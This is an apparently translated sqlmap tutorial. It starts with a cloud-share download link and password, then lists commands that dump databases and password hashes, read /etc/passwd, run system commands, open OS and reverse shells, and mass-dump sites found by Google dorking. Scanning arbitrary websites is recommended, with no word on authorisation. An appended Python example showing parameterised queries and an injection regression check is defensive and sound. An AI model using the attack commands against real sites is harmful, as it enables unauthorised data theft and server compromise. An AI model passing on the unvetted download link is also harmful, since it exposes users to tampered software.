Step One:
sqlmap is written in Python, so first download:
http://yunpan.cn/QiCBLZtGGTa7U  Access password: c26e
Step Two:
Install Python and extract sqlmap into the Python root directory.
Step Three:
A quick first try: view the sqlmap version:
python sqlmap/sqlmap.py -h
Step Four:
Use a SQL injection scanning tool to scan websites and find URLs suspected of having SQL injection problems.
Recommended: Woodpecker!
Step Five:
1. Basic information
python sqlmap/sqlmap.py -u "http://url/news?id=1"
python sqlmap/sqlmap.py -u "http://www.xxoo.com/news?id=1" --current-db  # get the current database name
python sqlmap/sqlmap.py -u "http://www.xxoo.com/news?id=1" -D "db_name"
python sqlmap/sqlmap.py -u "http://url/news?id=1" --columns -T "tablename" -D "db_name" -v 0  # list columns
python sqlmap/sqlmap.py -u "http://url/news?id=1" --dump -C "column_name" -T "table_name" -D "db_name" -v 0  # get the column contents
2. Information content
python sqlmap/sqlmap.py -u "http://url/news?id=1" --smart --level 3 --users  # smart; level sets the test level
python sqlmap/sqlmap.py -u "http://url/news?id=1" --dbms "Mysql" --users  # dbms specifies the database type
python sqlmap/sqlmap.py -u "http://url/news?id=1" --users  # list database users
python sqlmap/sqlmap.py -u "http://url/news?id=1" --dbs  # list databases
python sqlmap/sqlmap.py -u "http://url/news?id=1" --passwords  # database user passwords
python sqlmap/sqlmap.py -u "http://url/news?id=1" --passwords -U root -v 0  # list the database password of the specified user
python sqlmap/sqlmap.py -u "http://url/news?id=1" --dump -C "Password,user,id" -T "TableName" -D "db_name" --start 1 --stop 20  # list the specified columns, 20 entries
python sqlmap/sqlmap.py -u "http://url/news?id=1" --dump-all -v 0  # list all tables of all databases
python sqlmap/sqlmap.py -u "http://url/news?id=1" --privileges  # view privileges
python sqlmap/sqlmap.py -u "http://url/news?id=1" --privileges -U root  # view the specified user's privileges
python sqlmap/sqlmap.py -u "http://url/news?id=1" --is-dba -v 1  # whether the user is a database administrator
python sqlmap/sqlmap.py -u "http://url/news?id=1" --roles  # enumerate database user roles
python sqlmap/sqlmap.py -u "http://url/news?id=1" --udf-inject  # import user-defined functions (get system permissions!)
python sqlmap/sqlmap.py -u "http://url/news?id=1" --dump-all --exclude-sysdbs -v 0  # list all tables of the current database
python sqlmap/sqlmap.py -u "http://url/news?id=1" --union-cols  # union query table records
python sqlmap/sqlmap.py -u "http://url/news?id=1" --cookie "Cookie_value"  # cookie injection
python sqlmap/sqlmap.py -u "http://url/news?id=1" -b  # get banner information
python sqlmap/sqlmap.py -u "http://url/news?id=1" --data "id=3"  # POST injection
python sqlmap/sqlmap.py -u "http://url/news?id=1" -v 1 -f  # fingerprint the database type
python sqlmap/sqlmap.py -u "http://url/news?id=1" --proxy "http://127.0.0.1:8118"  # injection through a proxy
python sqlmap/sqlmap.py -u "http://url/news?id=1" --string "String_on_true_page"  # specify a keyword
python sqlmap/sqlmap.py -u "http://url/news?id=1" --sql-shell  # execute specified SQL commands
python sqlmap/sqlmap.py -u "http://url/news?id=1" --file /etc/passwd
python sqlmap/sqlmap.py -u "http://url/news?id=1" --os-cmd=whoami  # execute a system command
python sqlmap/sqlmap.py -u "http://url/news?id=1" --os-shell  # interactive system shell
python sqlmap/sqlmap.py -u "http://url/news?id=1" --os-pwn  # reverse shell
python sqlmap/sqlmap.py -u "http://url/news?id=1" --reg-read  # read the Windows registry
python sqlmap/sqlmap.py -u "http://url/news?id=1" --dbs -o "Sqlmap.log"  # save progress
python sqlmap/sqlmap.py -u "http://url/news?id=1" --dbs -o "Sqlmap.log" --resume  # resume saved progress
sqlmap -g "Google Grammar" --dump-all --batch  # Google search for injection points, automatically dump all fields
Attack example:
python sqlmap/sqlmap.py -u "http://url/news?id=1&Submit=Submit" --cookie="phpsessid=41aa833e6d0d28f489ff1ab5a7531406" --string="Surname" --dbms=mysql --users --password
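
What the scans above detect, seen from the server side, as an added example that is not part of the original tutorial: a hypothetical news?id= handler built by string concatenation next to a parameterized one, with a check that mirrors the true/false page comparison behind --string. The table, function names and sample rows are constructed for illustration.

```python
import sqlite3


def make_db():
    """Constructed sample data standing in for a site's news table."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO news VALUES (1, 'Launch day'), (2, 'Maintenance window');
    """)
    return db


def news_vulnerable(db, raw_id):
    # Weak form: the id value is pasted into the SQL text, so the database
    # parses whatever the client sent as part of the statement.
    rows = db.execute("SELECT title FROM news WHERE id = " + raw_id).fetchall()
    return [r[0] for r in rows]


def news_hardened(db, raw_id):
    # Hardened form: reject anything that is not an integer, then bind the
    # value as a parameter so it can never be parsed as SQL.
    try:
        news_id = int(raw_id)
    except ValueError:
        return []
    rows = db.execute("SELECT title FROM news WHERE id = ?", (news_id,)).fetchall()
    return [r[0] for r in rows]


def boolean_differential(handler, db):
    """Return True if an appended true/false condition changes the page.

    A differing result means the parameter reaches the SQL parser, which is
    the signal a keyword check on the "true" page relies on.
    """
    true_page = handler(db, "1 AND 1=1")
    false_page = handler(db, "1 AND 1=2")
    return true_page != false_page


if __name__ == "__main__":
    db = make_db()
    for handler in (news_vulnerable, news_hardened):
        print(handler.__name__, "injectable:", boolean_differential(handler, db))
```

Run against your own handler in a regression test, the same differential check confirms that a fix actually removed the injectable behaviour.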